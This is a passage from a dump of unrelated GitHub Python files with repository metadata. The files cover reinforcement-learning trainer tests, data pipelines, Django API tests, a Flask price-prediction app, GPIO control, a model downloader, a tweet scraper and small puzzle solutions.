trainer2.add_policy(parsed_behavior_id1, policy)\n\n trainer1_policy = trainer.get_policy(parsed_behavior_id1.behavior_id)\n trainer2_policy = trainer2.get_policy(parsed_behavior_id1.behavior_id)\n weights = trainer1_policy.get_weights()\n weights2 = trainer2_policy.get_weights()\n\n for w, lw in zip(weights, weights2):\n np.testing.assert_array_equal(w, lw)\n\n\ndef test_process_trajectory(dummy_config):\n mock_specs = mb.setup_test_behavior_specs(\n True, False, vector_action_space=[2], vector_obs_space=1\n )\n behavior_id_team0 = \"test_brain?team=0\"\n behavior_id_team1 = \"test_brain?team=1\"\n brain_name = BehaviorIdentifiers.from_name_behavior_id(behavior_id_team0).brain_name\n\n ppo_trainer = PPOTrainer(brain_name, 0, dummy_config, True, False, 0, \"0\")\n controller = GhostController(100)\n trainer = GhostTrainer(\n ppo_trainer, brain_name, controller, 0, dummy_config, True, \"0\"\n )\n\n # first policy encountered becomes policy trained by wrapped PPO\n parsed_behavior_id0 = BehaviorIdentifiers.from_name_behavior_id(behavior_id_team0)\n policy = trainer.create_policy(parsed_behavior_id0, mock_specs)\n trainer.add_policy(parsed_behavior_id0, policy)\n trajectory_queue0 = AgentManagerQueue(behavior_id_team0)\n trainer.subscribe_trajectory_queue(trajectory_queue0)\n\n # Ghost trainer should ignore this queue because off policy\n parsed_behavior_id1 = BehaviorIdentifiers.from_name_behavior_id(behavior_id_team1)\n policy = trainer.create_policy(parsed_behavior_id1, mock_specs)\n trainer.add_policy(parsed_behavior_id1, policy)\n 
trajectory_queue1 = AgentManagerQueue(behavior_id_team1)\n trainer.subscribe_trajectory_queue(trajectory_queue1)\n\n time_horizon = 15\n trajectory = make_fake_trajectory(\n length=time_horizon,\n max_step_complete=True,\n observation_specs=create_observation_specs_with_shapes([(1,)]),\n action_spec=mock_specs.action_spec,\n )\n trajectory_queue0.put(trajectory)\n trainer.advance()\n\n # Check that trainer put trajectory in update buffer\n assert trainer.trainer.update_buffer.num_experiences == 15\n\n trajectory_queue1.put(trajectory)\n trainer.advance()\n\n # Check that ghost trainer ignored off policy queue\n assert trainer.trainer.update_buffer.num_experiences == 15\n # Check that it emptied the queue\n assert trajectory_queue1.empty()\n\n\ndef test_publish_queue(dummy_config):\n mock_specs = mb.setup_test_behavior_specs(\n True, False, vector_action_space=[1], vector_obs_space=8\n )\n\n behavior_id_team0 = \"test_brain?team=0\"\n behavior_id_team1 = \"test_brain?team=1\"\n\n parsed_behavior_id0 = BehaviorIdentifiers.from_name_behavior_id(behavior_id_team0)\n\n brain_name = parsed_behavior_id0.brain_name\n\n ppo_trainer = PPOTrainer(brain_name, 0, dummy_config, True, False, 0, \"0\")\n controller = GhostController(100)\n trainer = GhostTrainer(\n ppo_trainer, brain_name, controller, 0, dummy_config, True, \"0\"\n )\n\n # First policy encountered becomes policy trained by wrapped PPO\n # This queue should remain empty after swap snapshot\n policy = trainer.create_policy(parsed_behavior_id0, mock_specs)\n trainer.add_policy(parsed_behavior_id0, policy)\n policy_queue0 = AgentManagerQueue(behavior_id_team0)\n trainer.publish_policy_queue(policy_queue0)\n\n # Ghost trainer should use this queue for ghost policy swap\n parsed_behavior_id1 = BehaviorIdentifiers.from_name_behavior_id(behavior_id_team1)\n policy = trainer.create_policy(parsed_behavior_id1, mock_specs)\n trainer.add_policy(parsed_behavior_id1, policy)\n policy_queue1 = AgentManagerQueue(behavior_id_team1)\n trainer.publish_policy_queue(policy_queue1)\n\n # check ghost trainer swap pushes to ghost queue and not trainer\n assert policy_queue0.empty() and policy_queue1.empty()\n trainer._swap_snapshots()\n assert policy_queue0.empty() and not policy_queue1.empty()\n # clear\n policy_queue1.get_nowait()\n\n buffer = mb.simulate_rollout(BUFFER_INIT_SAMPLES, mock_specs)\n # Mock out reward signal eval\n copy_buffer_fields(\n buffer,\n src_key=BufferKey.ENVIRONMENT_REWARDS,\n dst_keys=[\n BufferKey.ADVANTAGES,\n RewardSignalUtil.rewards_key(\"extrinsic\"),\n RewardSignalUtil.returns_key(\"extrinsic\"),\n RewardSignalUtil.value_estimates_key(\"extrinsic\"),\n RewardSignalUtil.rewards_key(\"curiosity\"),\n RewardSignalUtil.returns_key(\"curiosity\"),\n RewardSignalUtil.value_estimates_key(\"curiosity\"),\n ],\n )\n\n trainer.trainer.update_buffer = buffer\n\n # when ghost trainer advance and wrapped trainer buffers full\n # the wrapped trainer pushes updated policy to correct queue\n assert policy_queue0.empty() and policy_queue1.empty()\n trainer.advance()\n assert not policy_queue0.empty() and policy_queue1.empty()\n\n\nif __name__ == \"__main__\":\n pytest.main()\n","repo_name":"Unity-Technologies/ml-agents","sub_path":"ml-agents/mlagents/trainers/tests/torch_entities/test_ghost.py","file_name":"test_ghost.py","file_ext":"py","file_size_in_byte":8529,"program_lang":"python","lang":"en","doc_type":"code","stars":15647,"dataset":"github-code","pt":"48"} +{"seq_id":"5002174459","text":"# USAGE\n# python reading_from_memory.py\n\n# import 
the necessary packages\nfrom pyimagesearch.helpers import benchmark\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.datasets import cifar100\nfrom tensorflow.data import AUTOTUNE\nimport tensorflow as tf\n\n# initialize the batch size and number of steps\nBS = 64\nNUM_STEPS = 5000\n\n# load the CIFAR-10 dataset from\nprint(\"[INFO] loading the cifar100 dataset...\")\n((trainX, trainY), (testX, testY)) = cifar100.load_data()\n\n# create a standard image generator object\nprint(\"[INFO] creating a ImageDataGenerator object...\")\nimageGen = ImageDataGenerator()\ndataGen = imageGen.flow(\n\tx=trainX, y=trainY,\n\tbatch_size=BS, shuffle=True)\n\n# build a TensorFlow dataset from the training data\ndataset = tf.data.Dataset.from_tensor_slices((trainX, trainY))\n\n# build the data input pipeline\nprint(\"[INFO] creating a tf.data input pipeline..\")\ndataset = (dataset\n\t.shuffle(1024)\n\t.cache()\n\t.repeat()\n\t.batch(BS)\n\t.prefetch(AUTOTUNE)\n)\n\n# benchmark the image data generator and display the number of data\n# points generated, along with the time taken to perform the\n# operation\ntotalTime = benchmark(dataGen, NUM_STEPS)\nprint(\"[INFO] ImageDataGenerator generated {} images in \" \\\n\t \" {:.2f} seconds...\".format(\n\tBS * NUM_STEPS, totalTime))\n\n# create a dataset iterator, benchmark the tf.data pipeline, and\n# display the number of data points generator along with the time taken\ndatasetGen = iter(dataset)\ntotalTime = benchmark(datasetGen, NUM_STEPS)\nprint(\"[INFO] tf.data generated {} images in {:.2f} seconds...\".format(\n\tBS * NUM_STEPS, totalTime))","repo_name":"marb61a/Course-Notes","sub_path":"Artificial Intellingence/Python/Notebooks/PyImageSearch University/Deep Learning 125/tfdata-intro/reading_from_memory.py","file_name":"reading_from_memory.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"6351397824","text":"import pytest\nfrom django.conf import settings\n\nfrom kubeportal.models.portalgroup import PortalGroup\n\n\n@pytest.mark.django_db\ndef test_single_group_denied(api_client_anon, admin_group):\n url = f'/api/{settings.API_VERSION}/groups/{admin_group.pk}/'\n response = api_client_anon.get(url)\n assert response.status_code == 401\n\n\n@pytest.mark.django_db\ndef test_groups_denied(api_client_anon):\n group1 = PortalGroup(name=\"group1\")\n group1.save()\n response = api_client_anon.get(f'/api/{settings.API_VERSION}/groups/{group1.pk}/')\n assert response.status_code == 401\n\n\ndef test_group(api_client, admin_group):\n response = api_client.get(f'/api/{settings.API_VERSION}/groups/{admin_group.pk}/')\n assert response.status_code == 200\n\n data = response.json()\n assert data['name'] == admin_group.name\n\n\ndef test_group_invalid_id(api_client):\n response = api_client.get(f'/api/{settings.API_VERSION}/groups/777/')\n assert response.status_code == 404\n\n\ndef test_group_non_member(api_client):\n group1 = PortalGroup(name=\"group1\")\n group1.save()\n response = api_client.get(f'/api/{settings.API_VERSION}/groups/{group1.pk}/')\n assert response.status_code == 404","repo_name":"kubeportal/kubeportal","sub_path":"kubeportal/tests/test_api_groups.py","file_name":"test_api_groups.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"9938531735","text":"from flask import Flask, render_template, 
request\nimport pandas as pd\nimport numpy as np\nimport pickle\nimport joblib\nfrom sklearn.ensemble import VotingRegressor\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.ensemble import RandomForestRegressor\n\n\n\n# One hot encode the 'coin_name' feature\n# data = pd.get_dummies(data, columns=['coin_name'])\n\n\n# Create a Flask instance\napp = Flask(__name__)\n\n# Define the index page\n@app.route('/')\ndef index():\n return render_template('./index.html')\n\n# Define the predict page\n@app.route('/predict', methods=['POST'])\ndef predict():\n try:\n open = float(request.form['open']) if request.form['open'] else 0.0\n high = float(request.form['high']) if request.form['high'] else 0.0\n low = float(request.form['low']) if request.form['low'] else 0.0\n date = request.form['date'] if request.form['date'] else 0.0\n volume = float(request.form['volume']) if request.form['volume'] else 0.0\n coin_name = str(request.form['coin_name'])\n\n # rest of the code for prediction\n \n except Exception as e:\n x = (\"Error: {}\".format(str(e)))\n return render_template('index.html', data=x)\n\n\n\n # output validation\n if not coin_name or not open or not high or not low or not date or not volume:\n return render_template('index.html', data = \"Please fill out all fields.\")\n else:\n\n\n\n #Creating a data dictionary\n data_dict = {'Date': [date],'Open': [open], 'High': [high], 'Low': [low], 'Volume': [volume],\n 'ADA_GBP': [0], 'ATOM_GBP': [1], 'AVAX_GBP': [0], 'BNB_GBP': [0], 'BTC_GBP': [0], 'DAI_GBP': [0],\n 'DOGE_GBP': [0], 'DOT_GBP': [0], 'ETH_GBP': [0], 'FIL_GBP': [0], 'FTM_GBP': [0], 'GRC_GBP': [0],\n 'LINK_GBP': [0], 'LTC_GBP': [0], 'MATIC_GBP': [0], 'SOL_GBP': [0], 'TRX_GBP': [0], 'USDC_GBP': [0],\n 'USDT_GBP': [0], 'XRP_GBP': [0]}\n\n data_dict[coin_name] = [1]\n # create a new DataFrame with the same columns as the training data\n new_data = pd.DataFrame(data_dict)\n # convert the date column to a datetime data type\n new_data['Date'] = pd.to_datetime(new_data['Date'])\n # convert the date column to a float data type using Unix time (seconds since 1970-01-01)\n new_data['Date'] = (new_data['Date'] - pd.Timestamp(\"1970-01-01\")) // pd.Timedelta('1s')\n new_data['Date'] = new_data['Date'].astype(float)\n\n # make a prediction using the ensemble model\n model = joblib.load('ensemble.sav')\n close_price = (f\"CLOSE: {model.predict(new_data)[0]}\")\n \n\n # Return the prediction to the user\n return render_template('index.html', data=close_price)\n\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"C4LEB-ai/stock_prediction","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25334765483","text":"from random import randint\n\ndef solve(lock: str) -> str:\n num_list = sorted(lock, reverse=True)\n final_mod = int(lock) % 3\n\n if final_mod != 0:\n mod1_index = None\n mod2_indices = []\n\n for i in reversed(range(len(num_list))):\n num = int(num_list[i])\n current_mod = num % 3\n\n if current_mod == final_mod:\n mod1_index = i\n break\n elif current_mod != 0 and len(mod2_indices) < 2:\n mod2_indices.append(i)\n \n if mod1_index:\n num_list.pop(mod1_index)\n elif mod2_indices:\n num_list.pop(mod2_indices[0])\n num_list.pop(mod2_indices[1])\n\n return ''.join(num_list)\n\nstart = 11\nfor i in range(start, start + 20):\n inp = open('inp/' + str(i), 'w')\n out = open('out/' 
+ str(i), 'w')\n\n inp_text = []\n for i in range(randint(3, 10**5)):\n inp_text.append(str(randint(0, 9)))\n\n inp_text = ''.join(inp_text)\n inp.write(inp_text)\n out_text = solve(inp_text) + '\\n'\n out.write(out_text)","repo_name":"thinhntr/CS112.L12.KHCL","sub_path":"bt5/khoa_so/test_generator.py","file_name":"test_generator.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42141016614","text":"#\r\r\n# Home Automation Hub\r\r\n# Helper Script to process different Actuator Types\r\r\n#\r\r\n# Catching too general exception\r\r\n# pylint: disable=W0703\r\r\n#\r\r\n\"\"\"Actuator helpers\"\"\"\r\r\n\r\r\nimport sys\r\r\nimport logging\r\r\nimport RPi.GPIO as GPIO\r\r\n\r\r\n\r\r\n# --- Global Variables ---\r\r\nHUB_LOGGER = logging.getLogger('HubLogger')\r\r\n\r\r\n# BCM Pin References\r\r\nGPIO.setmode(GPIO.BCM)\r\r\nGPIO.setwarnings(False)\r\r\n\r\r\n\r\r\ndef simple_on_off(cur_val, method_params):\r\r\n\r\r\n \"\"\"Simple On/Off\"\"\"\r\r\n\r\r\n try:\r\r\n\r\r\n bcm_pin = int(method_params[0])\r\r\n HUB_LOGGER.debug(\"In simple_on_off %s %s \", cur_val, bcm_pin)\r\r\n status = -1\r\r\n if bcm_pin is not None:\r\r\n func = GPIO.gpio_function(bcm_pin)\r\r\n is_output = (func == GPIO.OUT)\r\r\n HUB_LOGGER.debug(\"Pin Mode %s %s %s\", func, GPIO.OUT, is_output)\r\r\n\r\r\n HUB_LOGGER.debug(\"Making Output always\")\r\r\n GPIO.setup(bcm_pin, GPIO.OUT)\r\r\n\r\r\n result = (cur_val > 0)\r\r\n cur_state = GPIO.input(bcm_pin)\r\r\n requires_changing = (GPIO.input(bcm_pin) != cur_val)\r\r\n HUB_LOGGER.debug(\r\r\n \"Reading Output %d = %s requires_changing? %s\",\r\r\n bcm_pin,\r\r\n cur_state,\r\r\n requires_changing)\r\r\n\r\r\n # turn on/off?\r\r\n if requires_changing:\r\r\n HUB_LOGGER.debug(\r\r\n \"Setting Output %d to %s ...\",\r\r\n bcm_pin,\r\r\n result)\r\r\n GPIO.output(bcm_pin, result)\r\r\n status = result\r\r\n\r\r\n return status\r\r\n\r\r\n except Exception:\r\r\n HUB_LOGGER.error(\"Error in simple_on_off\")\r\r\n etype = sys.exc_info()[0]\r\r\n value = sys.exc_info()[1]\r\r\n trace = sys.exc_info()[2]\r\r\n line = trace.tb_lineno\r\r\n HUB_LOGGER.error(\"%s %s %s\", etype, value, line)\r\r\n","repo_name":"paul-warren-hub/home-hub","sub_path":"code/controller/actuator_helpers/simple_on_off.py","file_name":"simple_on_off.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22859107309","text":"def overlaps(a, b):\n if a[1] >= b[0] and a[0] <= b[1]:\n return True\n if b[1] >= a[0] and b[0] <= a[1]:\n return True\n return False\n\n\ndef parse_range(range):\n range = range.split(\"-\")\n return [int(range[0]), int(range[1])]\n\n\ncontained_count = 0\n\nwith open(\"input.txt\") as file:\n for line in file:\n ranges = line.strip().split(\",\")\n\n a = parse_range(ranges[0])\n b = parse_range(ranges[1])\n\n if overlaps(a, b):\n contained_count += 1\n\nprint(contained_count)\n","repo_name":"Pysselbit/advent-of-code-2022","sub_path":"Calendar/Day 4 - Camp Cleanup/4-B.py","file_name":"4-B.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25255859646","text":"#!/usr/bin/python3\n\n# dlicv\n\nimport argparse as _argparse\nimport os as _os\nimport urllib.request\nfrom urllib.parse import urlparse\nimport zipfile\nimport sys as 
_sys\n\n##############################################################\n## This is a dictionary that keeps the saved models for now\nmdlurl = 'https://github.com/CBICA/DeepMRSeg-Models/raw/main/models'\n\nmodelDict = {}\nmodelDict['dlicv'] = mdlurl + '/DLICV/DeepMRSeg_DLICV_v1.0.zip'\n\n##############################################################\n\n## Path to saved models\nDEEPMRSEG = _os.path.expanduser(_os.path.join('~', '.dlicv'))\nMDL_DIR = _os.path.join(DEEPMRSEG, 'trained_models')\n\ndef _main():\n \"\"\"Main program for the script to download pre-trained models.\"\"\"\n \n argv = _sys.argv\n\n exeName = _os.path.basename(argv[0])\n\n descTxt = '{prog} downloads pre-trained DLICV model'.format(prog=exeName)\n\n ## Download model\n mdl_type = 'dlicv'\n\n mdlurl = modelDict[mdl_type]\n mdlfname = _os.path.basename(urlparse(mdlurl).path)\n outFile = _os.path.join(MDL_DIR , mdl_type, mdlfname)\n\n if _os.path.isdir(outFile.replace('.zip', '')):\n print(\"Model already downloaded: \" + outFile.replace('.zip', ''))\n\n else:\n print(\"Loading model: \" + mdl_type)\n\n outPath = _os.path.join(MDL_DIR , mdl_type)\n if not _os.path.exists(outPath):\n _os.makedirs(outPath)\n print('Created dir : ' + outPath)\n\n urllib.request.urlretrieve(mdlurl, outFile)\n print('Downloaded model : ' + outFile)\n\n with zipfile.ZipFile(outFile, 'r') as fzip:\n fzip.extractall(outPath)\n print('Unzipped model : ' + outFile.replace('.zip', ''))\n\n _os.remove(outFile)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"gurayerus/DLICV","sub_path":"DLICV/dlicv_downloadmodel.py","file_name":"dlicv_downloadmodel.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"11963326872","text":"import csv\nimport sys\nimport random\nimport cv2\nfrom gaskLibs.utils.segaug import ImgAugTransform\nfrom torch.utils.data.dataset import Dataset\n\nsys.path.insert(0, '..')\n\n\nclass ImageDataset(Dataset):\n def __init__(self, csv_path, img_size, is_aug):\n super().__init__()\n self.img_path = []\n self.labels = []\n self.transform = ImgAugTransform()\n self.isaug = is_aug\n self.img_w = img_size[0]\n self.img_h = img_size[1]\n\n with open(csv_path, newline='') as csvfile:\n rows = csv.reader(csvfile)\n _ = next(rows)\n for row in rows:\n self.img_path.append(row[0])\n self.labels.append(row[1])\n\n def __getitem__(self, index):\n\n img = cv2.imread(self.img_path[index])\n img = cv2.resize(img, (self.img_w, self.img_h))\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\n img_map = cv2.imread(self.labels[index])\n img_map = cv2.resize(img_map, (self.img_w, self.img_h))\n\n # pixel label to class label\n img_map = img_map / 255\n img_map = img_map.astype(int)\n\n if self.isaug:\n j = random.randint(0, 4)\n img_tensor, map_tensor = self.transform(img, img_map, j)\n\n else:\n img_tensor, map_tensor = self.transform(img, img_map, 3)\n\n return img_tensor, map_tensor\n\n def __len__(self):\n return len(self.labels)\n","repo_name":"GuffreyKu/image-segmentation","sub_path":"train_python/PTdata/Dataset.py","file_name":"Dataset.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73747475344","text":"import tweepy\nimport re\nimport csv\nimport os\nimport sys\nfrom pandas import DataFrame\n\nclass CreateTweetsCsv():\n\n def __init__(self,tweets_csv_file_path,logger,tweet_cursor,last_id_logged=None) -> None:\n 
self.tweets_csv_file_path = tweets_csv_file_path\n self.logger = logger\n self.last_id_logged = last_id_logged\n self.tweet_cursor = tweet_cursor\n\n def MakeCsvFile(self) -> bool:\n write_to_file = False\n if os.path.exists(self.tweets_csv_file_path):\n self.logger.info(\"Writing to file(s) ....\")\n write_to_file=True\n else:\n with open(self.tweets_csv_file_path,\"a+\") as tweets_csv_file:\n writer = csv.DictWriter(tweets_csv_file,fieldnames=[\"Tweet\",\"Reply\"])\n writer.writeheader()\n self.logger.info(\"File created ...\\nWriting to file(s) ....\")\n write_to_file = True\n\n print(\"Writing to file(s) ....\")\n\n return write_to_file\n\n def GetTweetsAndReplies(self, api, use_keywords=None):\n regex_str = \"@\\S*[^\\s]|RT |\\S*https?:\\S*|(\\n+)(?=.*)\"\n pattern = re.compile(regex_str) \n\n if self.MakeCsvFile():\n # Search for a tweet on the timeline\n # Find the replies\n try:\n self.records_added = 0\n self.current_since_id,tweet_text,reply_text= None,None,None\n # Alter the number of items to be returned\n for tweet in self.tweet_cursor.items():\n\n if use_keywords:\n replies = tweepy.Cursor(api.search,\n q='to:{} -filter:retweets'.format(tweet.user.screen_name),\n tweet_mode='extended').items(10)\n\n else:\n replies = tweepy.Cursor(api.search,\n tweet_mode='extended',\n q='to:{} -filter:retweets'.format(tweet.user.screen_name),\n include_entities=False).items(100)\n\n\n tweet_data = {\"Tweet\":[], \"Reply\":[]}\n\n try:\n for reply in replies:\n if reply.in_reply_to_status_id==tweet.id:\n # use full_text instead of text because of tweet mode extend\n tweet_text = pattern.sub('', tweet.full_text)\n else:\n if reply.in_reply_to_status_id != None:\n # Find the original tweets for the replies without\n tweetFetched = api.get_status(reply.in_reply_to_status_id,\n include_entities=False)\n tweet_text = tweetFetched.text\n tweet_text = pattern.sub('', tweet_text)\n \n reply_text = pattern.sub('', reply.full_text)\n if (tweet_text != None) & (reply_text != None):\n tweet_data[\"Tweet\"].append(tweet_text)\n tweet_data[\"Reply\"].append(reply_text)\n # Combine them all into one df\n data = DataFrame(tweet_data).drop_duplicates()\n data.to_csv(self.tweets_csv_file_path,\n mode = 'a',\n header = None,\n index = False)\n \n # Get the amount of data recieved\n self.records_added += len(data)\n # Save the last tweet id retreived\n self.current_since_id = tweet.id\n\n\n except tweepy.error.TweepError as er:\n # Log the specific errors if need be\n self.logger.error(\"TWEEPY ERROR: \",er)\n continue\n \n except Exception as e:\n self.logger.exception(e)\n self.logger.info(\"Number of entries added : \"+str(self.records_added))\n if self.current_since_id:\n self.logger.info(\"ID of last retrieved tweet before the error above: \"+str(self.current_since_id ))\n else:\n # If it hasn't completed the loop successfully even once\n self.logger.info(\"ID of last retrieved tweet before the error above: \"+str(self.last_id_logged ))\n\n\n self.logger.info(\"Number of entries added : \"+str(self.records_added))\n # Make these the last entry for easy retreival \n self.logger.info(\"ID of last retrieved tweet: \"+str(self.current_since_id ))\n\n except KeyboardInterrupt:\n # These will log the last values assigned before the interrupt\n self.logger.info(\"Number of entries added before KeybordInterrupt: \"+str(self.records_added))\n \n # if it had run through a complete cycle for tweet replies at least once\n if self.current_since_id:\n self.logger.info(\"ID of last retrieved tweet before KeybordInterrupt: 
\"+str(self.current_since_id ))\n else:\n # If it hasn't completed the loop successfully even once\n self.logger.info(\"ID of last retrieved tweet before KeybordInterrupt: \"+str(self.last_id_logged ))\n \n \n sys.exit(0)\n\n\n else:\n self.logger.critical(\" Could Not find/create csv file to write to\")\n \n ","repo_name":"AsetaShadrach/KenyaNLP","sub_path":"TweetCollection/GetTweets.py","file_name":"GetTweets.py","file_ext":"py","file_size_in_byte":5918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33070288276","text":"import unittest\nfrom q1python import period_generator\n\n# CRITERIA:\n# All periods and data points must be whole numbers\n# There can only ever be a maximum of 10 periods\n# Each point represents one second - a period may be no longer than 10 seconds\n# Each period must contain between one and 10 data points\n# Points must be stored in time order, with the earliest listed first\n\nlist1 = [1, 5, 6, 10, 11, 20, 21, 25, 26, 40, 41, 50]\n\nlist2 = [14, 9, 24, 2, 44, 8, 41, 4, 46, 26,\n 11, 31, 18, 24, 21, 4, 22, 50, 6, 36]\n\n\nclass TestPeriodGenerator(unittest.TestCase):\n\n # the result of this test depends on the values of list1 and list2\n def test_all_periods_and_data_points_whole_numbers(self):\n periods = period_generator(list1, list2)\n\n # all periods integers\n self.assertTrue(all(isinstance(period.start, int) and isinstance(\n period.end, int) for period in periods))\n\n # all points integers\n self.assertTrue(all(all(isinstance(point, int)\n for point in period.points) for period in periods))\n\n # similarly, the result of this test depends on the amount of values in list1\n def test_max_of_ten_periods(self):\n periods = period_generator(list1, list2)\n\n self.assertTrue(len(periods) <= 10)\n\n # similarly, the result of this test depends on the values of list1\n def test_period_no_longer_than_ten_secs(self):\n periods = period_generator(list1, list2)\n\n for period in periods:\n print((period.end - period.start))\n\n self.assertTrue(all((period.end - period.start) <=\n 10 for period in periods))\n\n def test_each_period_contains_between_one_and_ten_data_points(self):\n periods = period_generator(list1, list2)\n\n self.assertTrue(all(1 <= len(period.points)\n <= 10 for period in periods))\n\n def test_points_ordered_by_ascending(self):\n periods = period_generator(list1, list2)\n\n def list_is_ascending(list):\n output = True\n for i in range(len(list) - 1):\n if list[i+1] < list[i]:\n output = False\n return output\n\n self.assertTrue(all(list_is_ascending(period.points)\n for period in periods))\n\n# the program will NOT pass with the data set provided, due to the 3rd criteria (that a period can be no longer than 10 seconds),\n# as the penultimate period has a gap of 14 seconds (between 26 and 40)\n","repo_name":"Harrison-Hughes/anthesis-code-task","sub_path":"q2testing.py","file_name":"q2testing.py","file_ext":"py","file_size_in_byte":2523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71054722067","text":"\r\n# Aluna Diana Faustino de Siqueira\r\n# Exercícios aula 17\r\n\r\nconta = 0\r\nfrutas = []\r\nn = int(input())\r\nm = int(input())\r\n\r\nfor i in range(m):\r\n nome,preco = input().split()\r\n feira = {'nome':nome,'preco':float(preco)}\r\n frutas.append(feira)\r\n\r\np = int(input())\r\n\r\nfor j in range(p):\r\n nome,quantidade = input().split()\r\n quantidade = int(quantidade)\r\n\r\n for k in frutas:\r\n if k['nome'] == 
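
The tweet-cleaning regex in the GetTweets record above strips mentions, the RT prefix, URLs and newlines; a small standalone check of that behaviour (the sample tweet is invented for illustration):

import re

pattern = re.compile(r"@\S*[^\s]|RT |\S*https?:\S*|(\n+)(?=.*)")
raw = "RT @user: check this https://t.co/abc\nnice"
cleaned = pattern.sub('', raw)
# The retweet marker, the mention, the URL and the newline are gone;
# only the ordinary words survive (surrounding whitespace is untouched).
assert cleaned.split() == ['check', 'this', 'nice']
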
nome:\r\n conta += k['preco']*quantidade\r\nprint(f'R$ {conta:.2f}')","repo_name":"dexeme/uri-solutions","sub_path":"URI_1281.py","file_name":"URI_1281.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34693609124","text":"\"\"\"empty message\n\nRevision ID: 263dec48ea7f\nRevises: \nCreate Date: 2022-08-23 12:23:44.461815\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '263dec48ea7f'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('users',\n sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('name', sa.String(length=20), nullable=False),\n sa.Column('user_id', sa.String(length=20), nullable=False),\n sa.Column('email', sa.String(length=120), nullable=False),\n sa.Column('password', sa.String(length=255), nullable=False),\n sa.Column('birth', sa.DateTime(), nullable=False),\n sa.Column('alergy_dai', sa.Integer(), nullable=True),\n sa.Column('alergy_cru', sa.Integer(), nullable=True),\n sa.Column('alergy_nut', sa.Integer(), nullable=True),\n sa.Column('alergy_pch', sa.Integer(), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('email'),\n sa.UniqueConstraint('name'),\n sa.UniqueConstraint('user_id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('users')\n # ### end Alembic commands ###\n","repo_name":"Kogoon/fantastic-bassoon","sub_path":"migrations/versions/263dec48ea7f_.py","file_name":"263dec48ea7f_.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5578539383","text":"import cv2\nimport os\nimport pandas as pd\nfrom tqdm import tqdm\n\n\ndef split_ldr(root, size):\n for file in tqdm(os.listdir(root)):\n\n imgroot = os.path.join(root, file)\n image = cv2.imread(imgroot)\n\n height = image.shape[0]\n width = image.shape[1]\n\n file = file.split('.')[0]\n for y in range(0, height, size):\n for x in range(0, width, size):\n tiles = image[y:y + size, x:x + size]\n if (tiles.shape[0] == size) and (tiles.shape[1] == size):\n cv2.imwrite('data/train/split_img' + '/' + file + str(x) + '2' + str(y) + \".jpg\", tiles)\n #os.remove(root + '/input_2_aligned.tif')\n\n\ndef split_hdr(root, size):\n for file in tqdm(os.listdir(root)):\n imgroot = os.path.join(root, file)\n image = cv2.imread(imgroot, cv2.IMREAD_ANYDEPTH)\n\n height = image.shape[0]\n width = image.shape[1]\n\n file = file.split('.')[0]\n for y in range(0, height, size):\n for x in range(0, width, size):\n tiles = image[y:y + size, x:x + size]\n if (tiles.shape[0] == size) and (tiles.shape[1] == size):\n cv2.imwrite('data/train/split_img' + '/' + file + str(x) + '2' + str(y) + \".hdr\", tiles)\n #os.remove(root + '/ref_hdr_aligned.hdr')\n\n\nif __name__ == '__main__':\n #for file in tqdm(os.listdir('data/train/LDR')):\n #split_ldr('data/train/LDR', size=256)\n #for file in tqdm(os.listdir('data/train/HDR')):\n #split_hdr('data/train/HDR', size=256)\n\n df = pd.DataFrame()\n f = open('data/test/annotations.txt', 'w+')\n path = 'data/test/image_split'\n\n name_list = list()\n for file in os.listdir(path):\n name = file.split('.')[0]\n #name = name.split('_')[1]\n if name not in name_list:\n f.write(path + '/' + 
